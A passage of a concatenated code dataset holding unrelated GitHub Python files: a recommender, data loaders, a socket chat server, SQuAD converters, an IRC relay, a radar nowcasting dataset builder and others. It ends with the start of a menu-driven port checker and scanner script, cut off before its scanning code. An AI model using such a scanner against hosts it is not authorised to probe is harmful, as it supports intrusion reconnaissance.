unittest.main()\n","repo_name":"pedrotmatias/house_scrapping","sub_path":"house_scrapping/tests/test_remax_url_scapper.py","file_name":"test_remax_url_scapper.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8254817612","text":"import pandas as pd\r\nimport numpy as np\r\nimport movie_list as ml\r\n\r\n\r\ntitles = pd.read_csv('recom_title.csv')\r\ntitleids = pd.read_csv('recom_titleid.csv')\r\nsim_records = pd.read_csv('sim_record.csv')\r\n\r\nif __name__ == '__main__':\r\n user_movie_list,idss = ml.getMovieList()\r\n result = {}\r\n for ids in idss:\r\n recom_ids = titleids[titleids['title_id'] == ids].to_numpy().tolist()[0][1:]\r\n #print(recom_ids)\r\n sim_scores = sim_records[titleids['title_id'] == ids].to_numpy().tolist()[0][1:]\r\n #print(recom_ids)\r\n for i in range(15):\r\n if recom_ids[i] in result:\r\n result[recom_ids[i]] += sim_scores[i]\r\n else:\r\n result[recom_ids[i]] = sim_scores[i]\r\n recom_list = sorted(list(result.keys()), key = lambda x: result[x], reverse = True)\r\n recom_movies = [titles.loc[titleids['title_id'] == recom_id, 'title'].tolist()[0] for recom_id in recom_list]\r\n for movie in recom_movies[:15]:\r\n print(movie)\r\n","repo_name":"What-s-Our-Team-Name/CSE5914FinalProject","sub_path":"haidong/name_recommendations.py","file_name":"name_recommendations.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41007555458","text":"# -*- coding: utf-8 -*-\n# -----------------------------------\n# @CreateTime : 2020/3/19 23:07\n# @Author : Mark Shawn\n# @Email : shawninjuly@gmail.com\n# ------------------------------------\nimport os\nimport logging\nimport random\nimport numpy as np\nfrom functools import partial\n\nfrom .common import lazy\n\n\nclass DataLoader:\n\tdef __init__(self, use_mp=True, shuffle=False, batch_size=256, split_ratio=0.9, seed=None):\n\t\tself.use_mp = use_mp\n\t\tself.shuffle = shuffle\n\t\tself.batch_size = batch_size\n\n\t\tself.split_ratio = split_ratio\n\t\tassert 0 <= split_ratio <= 1, \"训练集与验证集之间的切割比率要在0-1之间!\"\n\n\t\tself.seed = seed\n\t\tnp.random.seed(self.seed)\n\n\tdef _load_from_file(self, file_path, dtype=float):\n\t\tassert os.path.exists(file_path), \"目标文件不存在: {}\".format(os.path.abspath(file_path))\n\t\twith open(file_path, \"r\") as fp:\n\t\t\tlines = fp.readlines()\n\t\t\tif self.use_mp:\n\t\t\t\timport multiprocessing as mp\n\t\t\t\twith mp.Pool() as p:\n\t\t\t\t\tdata = np.array(p.map(partial(self._load_line, dtype=dtype), lines))\n\t\t\telse:\n\t\t\t\tdata = np.array(list(map(partial(self._load_line, dtype=dtype), lines)))\n\t\tlogging.info(\"Loaded data with shape {} from {}\".format(data.shape, os.path.abspath(file_path)))\n\t\treturn data\n\n\tdef load_X(self, file_path):\n\t\tself.X = self._load_from_file(file_path, dtype=float)\n\t\tself.N_items, self.N_features = self.X.shape\n\n\tdef load_Y(self, file_path):\n\t\tself.Y = self._load_from_file(file_path, dtype=int).flatten()\n\n\tdef load_XY(self, file_path):\n\t\tdata = self._load_from_file(file_path, dtype=float)\n\t\tself.X = data[:, :-1]\n\t\tself.N_items, self.N_features = self.X.shape\n\t\tself.Y = data[:, -1].astype(int)\n\n\t@lazy\n\tdef data(self):\n\t\t_data = np.hstack([self.X, self.Y.reshape(-1, 1)])\n\t\treturn _data\n\n\t@lazy\n\tdef X_to_valid(self):\n\t\treturn self.X[int(self.N_items * self.split_ratio):]\n\n\t@lazy\n\tdef Y_to_valid(self):\n\t\treturn self.Y[int(self.N_items * self.split_ratio):]\n\n\t@lazy\n\tdef N_to_train(self):\n\t\treturn int(self.N_items * self.split_ratio)\n\n\t@lazy\n\tdef _train_slice(self) -> list:\n\t\t\"\"\"\n\t\t使用数组的索引以操控shuffle\n\t\t预期可以比直接shuffle训练数据效率更高\n\n\t\t:return: 返回一个索引列表,该列表不包含验证集部分\n\t\t\"\"\"\n\t\tidx = list(range(self.N_items))\n\t\tif self.shuffle:\n\t\t\trandom.shuffle(idx)\n\t\treturn idx[: self.N_to_train]\n\n\t@staticmethod\n\tdef _load_line(line, delimiter=\",\", dtype=float):\n\t\treturn np.array(line.split(delimiter), dtype=dtype)\n\n\tdef __iter__(self):\n\t\tfor i in range(0, self.N_to_train, self.batch_size):\n\t\t\tyield self.X[self._train_slice[i: i + self.batch_size]], \\\n\t\t\t self.Y[self._train_slice[i: i + self.batch_size]]\n\n\tdef __len__(self):\n\t\treturn np.ceil(self.N_to_train / self.batch_size).astype(int).item()\n","repo_name":"winterf97/MachineLarning_Numpy_CodeCraft2020","sub_path":"core/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"35659214064","text":"# import socket programming library \nimport socket \nimport struct \nfrom _thread import *\nimport threading \n\nprint_lock = threading.Lock() \n\n# thread fuction \ndef threaded_receive(c): \n\twhile True: \n\n\t\t# data received from client \n\t\tdata = c.recv(1024) \n\t\tif not data: \n\t\t\tprint('Bye') \n\t # lock released on exit \n\t\t\tprint_lock.release() \n\t\t\tbreak\n\t\tdata = data[2:]\n\t\tprint(\"\\nUser: \" + data.decode()) \n\n\t# connection closed \n\tc.close() \n\n\ndef threaded_send(c):\n\twhile True:\n\t\tmsg = input(\"\\n\")\n\t\tif msg is \"\\n\" :\n\t\t\tprint(\"ERROR\")\n\t\t\tbreak\n\t\t# msg = msg + \"\\n\"\n\t\tmsg = msg.encode(\"utf-8\", 'ignore')\n\t\tc.send(struct.pack(\"!H\", len(msg)))\n\t\tc.send(msg)\n\tc.close()\n\n\ndef Main(): \n\thost = \"10.147.148.105\" \n\n\t# reverse a port on your computer \n\t# in our case it is 12345 but it \n\t# can be anything \n\tport = int(input(\"Port ?\"))\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\ts.bind((host, port)) \n\tprint(\"socket binded to post\", port) \n\n\t# put the socket into listening mode \n\ts.listen(5) \n\tprint(\"socket is listening\") \n\n\t# a forever loop until client wants to exit \n\twhile True: \n\n\t\t# establish connection with client \n\t\tc, addr = s.accept() \n\n\t\t# lock acquired by client \n\t\tprint('Connected to :', addr[0], ':', addr[1]) \n\n\t\tprint_lock.acquire() \n\n\t\t# Start a new thread and return its identifier\n\t\tstart_new_thread(threaded_send,(c,))\n\t\tstart_new_thread(threaded_receive, (c,))\n\ts.close()\n\nif __name__ == '__main__': \n\tMain() \n","repo_name":"RKJenamani/J.A.R.V.I.C.","sub_path":"Front_end/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70818345106","text":"from datasets import Dataset\nfrom loguru import logger\n\n\ndef preprocess_squad_format(dataset: Dataset) -> Dataset:\n \"\"\"Preprocesses a dataset in SQuAD format (nested answers) to a dataset in SQuAD format that has flat answers.\n {\"answer\": {\"text\": \"answer\", \"start\": 0}} -> {\"text\": \"answer\"}\n\n Args:\n dataset (Dataset): A huggingface dataset in SQuAD format.\n\n Returns:\n Dataset: A huggingface dataset in SQuAD format with flat answers.\n \"\"\"\n\n def preprocess(example):\n if example[\"answers\"]:\n example[\"answers\"] = example[\"answers\"].pop()\n else:\n example[\"answers\"] = \"\"\n return example\n\n dataset = dataset.flatten().rename_column(\"answers.text\", \"answers\").map(preprocess)\n return dataset\n\n\ndef postprocess_squad_format(dataset: Dataset, add_answer_start: bool = True) -> Dataset:\n \"\"\"Postprocesses a dataset in SQuAD format (flat answers) to a dataset in SQuAD format that has nested answers.\n {\"text\": \"answer\"} -> {\"answer\": {\"text\": \"answer\", \"start\": 0}}\n\n Args:\n dataset (Dataset): A huggingface dataset in SQuAD format.\n add_answer_start (bool, optional): Whether to add the answer start index to the dataset. Defaults to True.\n\n Returns:\n Dataset: A huggingface dataset in SQuAD format with nested answers.\n \"\"\"\n # remove punctuation and whitespace from the start and end of the answer\n def remove_punctuation(example):\n example[\"answers\"] = example[\"answers\"].strip(\".,;!? \")\n return example\n\n dataset = dataset.map(remove_punctuation)\n\n if add_answer_start:\n dataset = dataset.map(calculate_answer_start)\n\n def unify_answers(example):\n is_answerable = \"answer_start\" in example\n if is_answerable:\n example[\"answers\"] = {\"text\": [example[\"answers\"]], \"answer_start\": [example[\"answer_start\"]]}\n else:\n example[\"answers\"] = {\"text\": [], \"answer_start\": []}\n return example\n\n dataset = dataset.map(unify_answers)\n if \"answer_start\" in dataset.column_names:\n dataset = dataset.remove_columns(\"answer_start\")\n return dataset\n\n\ndef calculate_answer_start(example):\n \"\"\"Calculates the answer start index for a SQuAD example.\n\n Args:\n example (Dict): A SQuAD example.\n\n Returns:\n Dict: The SQuAD example with the answer start index added.\n \"\"\"\n answer_start = example[\"context\"].lower().find(example[\"answers\"].lower())\n if answer_start < 0:\n logger.info(\n 'Could not calculate the answer start because the context \"{}\" ' 'does not contain the answer \"{}\".',\n example[\"context\"],\n example[\"answers\"],\n )\n answer_start = -1\n else:\n # check that the answer doesn't occur more than once in the context\n second_answer_start = example[\"context\"].lower().find(example[\"answers\"].lower(), answer_start + 1)\n if second_answer_start >= 0:\n logger.info(\"Could not calculate the answer start because the context contains the answer more than once.\")\n answer_start = -1\n else:\n # correct potential wrong capitalization of the answer compared to the context\n example[\"answers\"] = example[\"context\"][answer_start : answer_start + len(example[\"answers\"])]\n example[\"answer_start\"] = answer_start\n return example\n","repo_name":"flairNLP/fabricator","sub_path":"src/fabricator/dataset_transformations/question_answering.py","file_name":"question_answering.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"} +{"seq_id":"2444003286","text":"__author__ = \"Andrew Seitz\"\n\"\"\"\nMain iirc event loop. Hosts the relay and is responsible for launching irc modules.\n\"\"\"\n\nimport sys\n\nfrom twisted.internet import protocol, reactor\nfrom twisted.internet.endpoints import TCP4ServerEndpoint\nfrom twisted.internet.protocol import Factory\nfrom twisted.protocols import amp\nfrom twisted.protocols.basic import LineReceiver\nfrom twisted.python import log\n\nimport commands\nimport ircclient\n\n\nclass SupCommand(amp.Command):\n pass\n\n\nclass AMPProtocol(amp.AMP):\n \"\"\"Needs reference to own factory\"\"\"\n\n def __init__(self):\n self.ampFactory = None\n\n @commands.SupCommand.responder\n def sup(self):\n log.msg('got sup')\n return {}\n\n @commands.IRCSendRelayMSGLine.responder\n def cmdIRCSendRelayMSGLine(self, server, channel, user, message):\n user = user.split('!', 1)[0]\n\n line = 'msg {0} {1} {2} {3}'.format(server, channel, user, message)\n self.ampFactory.getRelay().sendLine(line)\n return {}\n\n @commands.IRCSendRelayInfoLine.responder\n def cmdIRCSendRelayInfoLine(self, message):\n self.ampFactory.getRelay().sendLine(message)\n return {}\n\n def connectionMade(self):\n self.ampFactory.setAMP(self)\n log.msg('Connection with amp server made, proto: ', self.ampFactory.getAMP())\n\n def connectionLost(self, reason):\n log.msg('AMP client disconnected')\n # tear everything down\n\n\nclass AMPFactory(protocol.ServerFactory):\n protocol = AMPProtocol\n\n \"\"\"Needs a reference to its current AMP and the Relay factory\"\"\"\n\n def __init__(self):\n self.amp = None\n self.relayFactory = None\n\n def buildProtocol(self, addr):\n self.amp = AMPProtocol()\n self.amp.ampFactory = self\n log.msg('AMP client spawned')\n return self.amp\n\n def getAMP(self):\n return self.amp\n\n def setAMP(self, ap):\n self.amp = ap\n\n def getRelay(self):\n return self.relayFactory.getRelay()\n\n def setRelayFactory(self, rf):\n self.relayFactory = rf\n\n def getRelayFactory(self):\n return self.relayFactory\n\n\nclass RelayProtocol(LineReceiver):\n def __init__(self):\n # self.relayFactory = rf\n # self.relayFactory.setRelay(self)\n self.relayFactory = None\n\n \"\"\"Wants a reference to its factory\"\"\"\n\n def connectionMade(self):\n self.relayFactory.setRelay(self)\n self.sendLine('Welcome to iirc')\n self.sendLine('Type \\'connect \\' to join a server')\n\n def connectionLost(self, reason):\n log.msg('Relay server lost connection with client: ', reason)\n\n def lineReceived(self, line):\n # When a line is received from the client\n cmd = line.split(' ', 1)\n if cmd[0] == 'cmd':\n log.msg('Command received: ', cmd[1])\n\n elif cmd[0] == 'connect':\n # Syntax: connect \n args = cmd[1].split(' ', 2)\n server = args[0]\n nickname = args[1]\n port = int(args[2])\n log.msg('Connecting to server: ' + args[0])\n # Launch the irc client module here\n ircclient.launchIRC(server, nickname, port)\n\n elif cmd[0] == 'sendLine':\n # Send a line to the irc server and channel\n # sendLine \n args = cmd[1].split(' ', 3)\n d = self.relayFactory.getAMP().callRemote(\n commands.IRCSendLine,\n server=args[0],\n channel=args[1],\n message=args[3])\n d.addCallback(lambda l: log.msg('sendLine sent line: ', cmd[1]))\n\n elif cmd[0] == 'join':\n # TODO: Add the server identifier, then make the responder handle it\n # Tell the irc client to join a new channel\n args = cmd[1].split(' ', 2)\n log.msg('Join command: ', args)\n d = self.relayFactory.getAMP().callRemote(\n commands.IRCJoinChannel,\n server=args[0],\n channel=args[1])\n d.addCallback(lambda l: log.msg('Join channel ', args))\n\n elif cmd[0] == 'part':\n # Tell the irc client to leave a channel\n args = cmd[1].split(' ')\n argLength = len(args)\n if argLength == 1:\n reason = ''\n else:\n reason = args[1]\n\n if argLength < 2:\n self.relayFactory.getAMP().callRemote(\n commands.IRCLeaveChannel,\n channel=args[0],\n reason=reason)\n else:\n self.sendLine('Error: bad command: ' + cmd[0] + ' ' + cmd[1])\n\n elif cmd[0] == 'disconnect':\n # Kill the irc module\n log.msg('disconnect received')\n\n else:\n log.msg(cmd)\n\n\nclass RelayFactory(Factory):\n protocol = RelayProtocol\n\n def __init__(self):\n \"\"\"Needs reference to current Relay and the AMP Factory\"\"\"\n self.relay = None\n self.ampFactory = None\n\n # def sendAMP(self, arg):\n # self.ampFactory.amp.callRemote(arg)\n\n def getRelay(self):\n return self.relay\n\n def setRelay(self, rl):\n self.relay = rl\n\n def getAMP(self):\n return self.ampFactory.getAMP()\n\n def setAMPFactory(self, af):\n self.ampFactory = af\n\n def getAMPFactory(self):\n return self.ampFactory\n\n def startedConnecting(self, connector):\n log.msg('Main server line receiver connecting...')\n\n def buildProtocol(self, addr):\n log.msg('Main server line receiver connected!')\n self.relay = RelayProtocol()\n self.relay.relayFactory = self\n return self.relay\n\n\ndef startIIRC():\n log.startLogging(sys.stdout)\n\n \"\"\"Start the AMP server\"\"\"\n amppoint = TCP4ServerEndpoint(reactor, 9992)\n ampfactory = AMPFactory()\n amppoint.listen(ampfactory)\n\n log.msg(\"AMP server started\")\n\n \"\"\"Start the Relay server\"\"\"\n relaypoint = TCP4ServerEndpoint(reactor, 9993)\n relayfactory = RelayFactory()\n relaypoint.listen(relayfactory)\n\n relayfactory.setAMPFactory(ampfactory)\n ampfactory.setRelayFactory(relayfactory)\n\n log.msg('relayFactory.ampFactory: ', relayfactory.getAMPFactory())\n log.msg('ampFactory.relayFactory: ', ampfactory.getRelayFactory())\n\n # log.msg('relayFactory reference to amp: ', relayFactory.getAMP())\n # log.msg('ampFactory reference to relay: ', ampFactory.getRelay())\n\n # reactor.run()","repo_name":"StolenToast/IIRC","sub_path":"iirc.py","file_name":"iirc.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2149144318","text":"\"\"\"\nMakes training and test dataset for radar nowcasting model\n\"\"\"\n\nimport sys\nsys.path.append('..') # add src to path\nimport argparse\nimport logging\nimport datetime\n\nimport os\nimport h5py\nos.environ[\"HDF5_USE_FILE_LOCKING\"]='FALSE'\n\nimport sys\nimport numpy as np\nimport pandas as pd\n\nfrom src.generator import SEVIRGenerator\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Make nowcast training & test datasets using SEVIR')\n parser.add_argument('--input_types', nargs='+', type=str, help='list of input SEVIR modalities', default=['vil'])\n parser.add_argument('--output_types', nargs='+', type=str, help='list of output SEVIR modalities', default=['vil'])\n parser.add_argument('--sevir_data', type=str, help='location of SEVIR dataset',default='../../data/sevir')\n parser.add_argument('--sevir_catalog', type=str, help='location of SEVIR dataset',default='../../data/CATALOG.csv')\n parser.add_argument('--output_location', type=str, help='location of SEVIR dataset',default='../../data/processeed')\n parser.add_argument('--n_train',type=int,help='Maximum number of samples to use for training (None=all)',default=None)\n parser.add_argument('--n_test',type=int,help='Maximum number of samples to use for testing (None=all)',default=None)\n parser.add_argument('--n_chunks', type=int, help='Number of chucks to use (increase if memory limited)',default=8)\n parser.add_argument('--split_date', type=str, help='Day (yymmdd) to split train and test',default='190601')\n parser.add_argument('--append',action='store_true',help='Wrtie chunks into one single file instead of individual files')\n parser.add_argument('--shuffle',action='store_true',help='Shuffle dataset before writing to h5 files')\n \n args = parser.parse_args()\n return args\n\n\ndef main(args):\n \"\"\" \n Runs data processing scripts to extract training set from SEVIR\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.info('making nowcasting data set from raw data')\n split_date = datetime.datetime.strptime(args.split_date,'%y%m%d')\n\n trn_generator = get_nowcast_train_generator(sevir_catalog=args.sevir_catalog,\n sevir_location=args.sevir_data,\n x_types=args.input_types,\n y_types=args.output_types,\n end_date=split_date,\n shuffle=args.shuffle)\n tst_generator = get_nowcast_test_generator(sevir_catalog=args.sevir_catalog,\n sevir_location=args.sevir_data,\n x_types=args.input_types,\n y_types=args.output_types,\n start_date=split_date,\n shuffle=args.shuffle)\n \n logger.info('Reading/writing training data to %s' % ('%s/nowcast_training.h5' % args.output_location))\n read_write_chunks('%s/nowcast_training.h5' % args.output_location,trn_generator,args.n_chunks,\n args.input_types, args.output_types,append=args.append)\n logger.info('Reading/writing testing data to %s' % ('%s/nowcast_testing.h5' % args.output_location))\n read_write_chunks('%s/nowcast_testing.h5' % args.output_location,tst_generator,args.n_chunks,\n args.input_types, args.output_types,append=args.append)\n\n\ndef read_write_chunks( out_filename, generator, n_chunks, input_types, output_types, append=False ):\n logger = logging.getLogger(__name__)\n chunksize = len(generator)//n_chunks\n # get first chunk\n logger.info('Gathering chunk 0/%s:' % n_chunks)\n (X,Y),meta=generator.load_batches(n_batches=chunksize,offset=0,progress_bar=True,return_meta=True)\n\n # Create datasets\n fn,ext=os.path.splitext(out_filename)\n cs = '' if append else '_000'\n filename=fn+cs+ext\n for i,x in enumerate(X):\n with h5py.File(filename, 'w' if i==0 else 'a') as hf:\n hf.create_dataset('IN_%s' % input_types[i], data=x, maxshape=(None,x.shape[1],x.shape[2],x.shape[3]))\n for i,y in enumerate(Y):\n with h5py.File(filename, 'a') as hf:\n hf.create_dataset('OUT_%s' % output_types[i], data=y, maxshape=(None,y.shape[1],y.shape[2],y.shape[3]))\n if not append:\n meta.to_csv(fn+cs+'_META.csv')\n # Gather other chunks\n for c in range(1,n_chunks+1):\n cs = '' if append else '_%.3d' % c\n filename=fn+cs+ext\n offset = c*chunksize\n n_batches = min(chunksize,len(generator)-offset)\n if n_batches<0: # all done\n break\n logger.info('Gathering chunk %d/%s:' % (c,n_chunks))\n (X,Y),metac=generator.load_batches(n_batches=n_batches,offset=offset,progress_bar=True,return_meta=True)\n if append:\n meta=pd.concat((meta,metac))\n for i,x in enumerate(X):\n with h5py.File(filename, 'a') as hf:\n k='IN_%s' % input_types[i]\n hf[k].resize((hf[k].shape[0] + x.shape[0]), axis = 0)\n hf[k][-x.shape[0]:] = x\n for i,y in enumerate(Y):\n with h5py.File(filename, 'a') as hf:\n k='OUT_%s' % output_types[i]\n hf[k].resize((hf[k].shape[0] + y.shape[0]), axis = 0)\n hf[k][-y.shape[0]:] = y\n else: # write to a new file\n for i,x in enumerate(X):\n with h5py.File(filename, 'w' if i==0 else 'a') as hf:\n hf.create_dataset('IN_%s' % input_types[i], data=x, maxshape=(None,x.shape[1],x.shape[2],x.shape[3]))\n for i,y in enumerate(Y):\n with h5py.File(filename, 'a') as hf:\n hf.create_dataset('OUT_%s' % output_types[i], data=y, maxshape=(None,y.shape[1],y.shape[2],y.shape[3]))\n metac.to_csv(fn+cs+'_META.csv')\n if append:\n meta.to_csv(fn+cs+'_META.csv')\n\n\nclass NowcastGenerator(SEVIRGenerator):\n \"\"\"\n Generator that loads full VIL sequences, and spilts each\n event into three training samples, each 12 frames long.\n\n Event Frames: [-----------------------------------------------]\n [----13-----][---12----]\n [----13----][----12----]\n [-----13----][----12----]\n \"\"\"\n def get_batch(self, idx,return_meta=False):\n \"\"\"\n Splits batch into three hour-long past/future sequences\n \"\"\"\n (X,_),meta = super(NowcastGenerator, self).get_batch(idx,return_meta=True) # N,L,W,49\n x_out,y_out=[],[]\n for t in range(len(X)):\n x1,x2,x3 = X[t][:,:,:,:13],X[t][:,:,:,12:25],X[t][:,:,:,24:37]\n y1,y2,y3 = X[t][:,:,:,13:25],X[t][:,:,:,25:37],X[t][:,:,:,37:49]\n Xnew = np.concatenate((x1,x2,x3),axis=0)\n Ynew = np.concatenate((y1,y2,y3),axis=0)\n x_out.append(Xnew)\n if self.x_img_types[t] in self.y_img_types:\n y_out.append(Ynew)\n if return_meta:\n return (x_out,y_out),meta\n else:\n return x_out,y_out\n \n def get_batch_metadata(self,idx):\n \"\"\"\n Duplicates meta three times and adjusts time stamps\n \"\"\"\n meta = super(NowcastGenerator, self).get_batch_metadata(idx)\n meta['minute_offsets']=':'.join([str(n) for n in range(-60,65,5)])\n meta1,meta2,meta3=meta.copy(),meta.copy(),meta.copy()\n meta1['time_utc'] = meta['time_utc'] - pd.Timedelta(hours=1)\n meta3['time_utc'] = meta['time_utc'] + pd.Timedelta(hours=1)\n return pd.concat((meta1,meta2,meta3))\n \n \ndef get_nowcast_train_generator(sevir_catalog,\n sevir_location,\n x_types=['vil'],\n y_types=['vil'],\n batch_size=8,\n start_date=None,\n end_date=datetime.datetime(2019,6,1),\n **kwargs):\n filt = lambda c: c.pct_missing==0 # remove samples with missing radar data\n return NowcastGenerator(catalog=sevir_catalog,\n sevir_data_home=sevir_location,\n x_img_types=x_types,\n y_img_types=y_types,\n batch_size=batch_size,\n start_date=start_date,\n end_date=end_date,\n catalog_filter=filt,\n **kwargs)\n\ndef get_nowcast_test_generator(sevir_catalog,\n sevir_location,\n x_types=['vil'],\n y_types=['vil'],\n batch_size=8,\n start_date=datetime.datetime(2019,6,1),\n end_date=None,\n **kwargs):\n filt = lambda c: c.pct_missing==0 # remove samples with missing radar data\n return NowcastGenerator(catalog=sevir_catalog,\n sevir_data_home=sevir_location,\n x_img_types=x_types,\n y_img_types=y_types,\n batch_size=batch_size,\n start_date=start_date,\n end_date=end_date,\n catalog_filter=filt,\n **kwargs)\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n args=parse_args()\n main(args)\n","repo_name":"MIT-AI-Accelerator/sevir_challenges","sub_path":"radar_nowcasting/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":9646,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"36418471945","text":"import click\nfrom chakin.cli import pass_context, json_loads\nfrom chakin.decorators import custom_exception, dict_output\n\n\n@click.command('add_biomaterial')\n@click.argument(\"biomaterial_name\", type=str)\n@click.argument(\"organism_id\", type=int)\n@click.option(\n \"--description\",\n help=\"Description of the biomaterial\",\n type=str\n)\n@click.option(\n \"--biomaterial_provider\",\n help=\"Biomaterial provider name\",\n type=str\n)\n@click.option(\n \"--biosample_accession\",\n help=\"Biosample accession number\",\n type=str\n)\n@click.option(\n \"--sra_accession\",\n help=\"SRA accession number\",\n type=str\n)\n@click.option(\n \"--bioproject_accession\",\n help=\"Bioproject accession number\",\n type=str\n)\n@click.option(\n \"--attributes\",\n help=\"Custom attributes (In JSON dict form)\",\n type=str\n)\n@pass_context\n@custom_exception\n@dict_output\ndef cli(ctx, biomaterial_name, organism_id, description=\"\", biomaterial_provider=\"\", biosample_accession=\"\", sra_accession=\"\", bioproject_accession=\"\", attributes={}):\n \"\"\"Add a new biomaterial to the database\n\nOutput:\n\n Biomaterial details\n \"\"\"\n return ctx.gi.expression.add_biomaterial(biomaterial_name, organism_id, description=description, biomaterial_provider=biomaterial_provider, biosample_accession=biosample_accession, sra_accession=sra_accession, bioproject_accession=bioproject_accession, attributes=attributes)\n","repo_name":"galaxy-genome-annotation/python-chado","sub_path":"chakin/commands/expression/add_biomaterial.py","file_name":"add_biomaterial.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"31362853815","text":"import pytest\nfrom aiogtts.tokenizer.pre_processors import tone_marks, end_of_line, abbreviations, word_sub\n\n\ndef test_tone_marks():\n _in = 'lorem!ipsum?'\n _out = 'lorem! ipsum? '\n assert tone_marks(_in) == _out\n\n\ndef test_end_of_line():\n _in = '''test-\ning'''\n _out = 'testing'\n assert end_of_line(_in) == _out\n\n\ndef test_abbreviations():\n _in = 'jr. sr. dr.'\n _out = 'jr sr dr'\n assert abbreviations(_in) == _out\n\n\ndef test_word_sub():\n _in = 'Esq. Bacon'\n _out = 'Esquire Bacon'\n assert word_sub(_in) == _out\n\n\nif __name__ == '__main__':\n pytest.main(['-x', __file__])\n","repo_name":"Helow19274/aiogTTS","sub_path":"tests/test_tokenizer_pre_processors.py","file_name":"test_tokenizer_pre_processors.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"14896637516","text":"import os,sys,time\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom scipy.signal import savgol_filter\n# plot to compare optimizers\n# 30 tf.train.GradientDescentOptimizer (with scheduler)\n# 32 tf.train.AdamOptimizer\n# 34 tf.train.RMSPropOptimizer\n# 36 tf.train.AdadeltaOptimizer\n# 38 tf.train.GradientDescentOptimizer\n\n\ndb_root = \"/home/maksym/Desktop/slt_titan\"\nout_path = \"/home/maksym/Desktop/9520_final/plots\"\n#folders = [\"cfg4_30\",\"cfg4_31\",\"cfg4_32\",\"cfg4_33\",\"cfg4_34\",\"cfg4_35\",\"cfg4_36\",\"cfg4_37\",\"cfg4_38\",\"cfg4_39\"]\nfolders= [\"cfg4_29\",\"cfg4_30\",\"cfg4_31\"]\n\n#from os import listdir\n#from os.path import isfile, join\n\n\nruns_means = []\nruns_filts = []\nfor folder_name in folders:\n folder = os.path.join(db_root, folder_name)\n runfiles = [f for f in os.listdir(folder) if os.path.isfile(os.path.join(folder, f))]\n runs_data = []\n for runfile in runfiles:\n run_data = np.loadtxt(os.path.join(folder,runfile))\n runs_data.append(run_data)\n # work on data\n runs_data = np.asarray(runs_data)\n runs_mean = np.mean(runs_data,axis=0)\n runs_filt = savgol_filter(runs_mean,101,4)\n runs_means.append(runs_mean)\n runs_filts.append(runs_filt)\n\n\n\nX = np.arange(0,25000) * 0.001\n\nfig = plt.figure()\nmatplotlib.rcParams.update({'font.size': 18})\nfig.set_size_inches(12.8, 12.8)\nax = fig.gca(yscale=\"log\")\nax.set_xlabel(\"Epoch\")\nax.set_ylabel(\"Loss\")\n\n\n\n# plot SGD\nplt.plot(X,runs_filts[0]) # color='c', alpha=0.3\nplt.plot(X,runs_filts[1][:25000])\n# plot ADAM\nplt.plot(X,runs_filts[2][:25000])\n\n\nax.legend([\"SGD-1x256\",\"SGD-64x256\",\"SGD-256x256\"])#,prop={'size': 12})\nplt.savefig(os.path.join(out_path, \"optimizers2.png\"))\nplt.close()\n\n\n\n# # plot SGD\n# plt.plot(X,runs_filts[8],color=\"C0\") # color='c', alpha=0.3\n# plt.plot(X,runs_filts[9],color=\"C0\",alpha=0.5)\n# # plot ADAM\n# plt.plot(X,runs_filts[2],color=\"C1\")\n# plt.plot(X,runs_filts[3],color=\"C1\",alpha=0.5)\n# # plot RMSprop\n# plt.plot(X,runs_filts[4],color=\"C2\")\n# plt.plot(X,runs_filts[5],color=\"C2\",alpha=0.5)\n# # plot AdaDelta\n# plt.plot(X,runs_filts[6],color=\"C3\")\n# plt.plot(X,runs_filts[7],color=\"C3\",alpha=0.5)\n#\n# ax.legend([\"SGD\",\"Pranam-SGD\",\"Adam\",\"Pranam-Adam\",\"RMSProp\",\"Pranam-RMSProp\",\"AdaDelta\",\"Pranam-AdaDelta\"])#,prop={'size': 12})\n# plt.savefig(os.path.join(out_path, \"optimizers.png\"))\n# plt.close()","repo_name":"MKorablyov/9520_final","sub_path":"temp_optplot.py","file_name":"temp_optplot.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73524535187","text":"import socket # siteye bağlanmamız için \"socket\" modülünü çağırıyoruz\nprint(\"\"\"\n\n\n _______ ___ _ ___ _ _ _____ \n | ____\\ \\/ / \\ | |_ _| \\ | | ____|\n | _| \\ /| \\| || || \\| | _| \n | |___ / \\| |\\ || || |\\ | |___ \n |_____/_/\\_\\_| \\_|___|_| \\_|_____|\n\n\n\"\"\")\nprint(\"\"\"\n(1) Port Checker\n(2) Port Scanner \n(3) Exit\n\"\"\") #\"socket.SOCK_STREAM\" ise sunucu ile TCP biçiminde iletişime geçer.\ns = socket.socket(socket.AF_INET , socket.SOCK_STREAM) # \"socket.AF_INE\" komutu ip adresi bilgilerini alıp wep sitesine bağlanıp bilgi alışverişi yapar.\noption = int(input(\"Option >> \")) \nif option == 3 : \n print(\"exit...\")\n exit\n\nelif option == 1 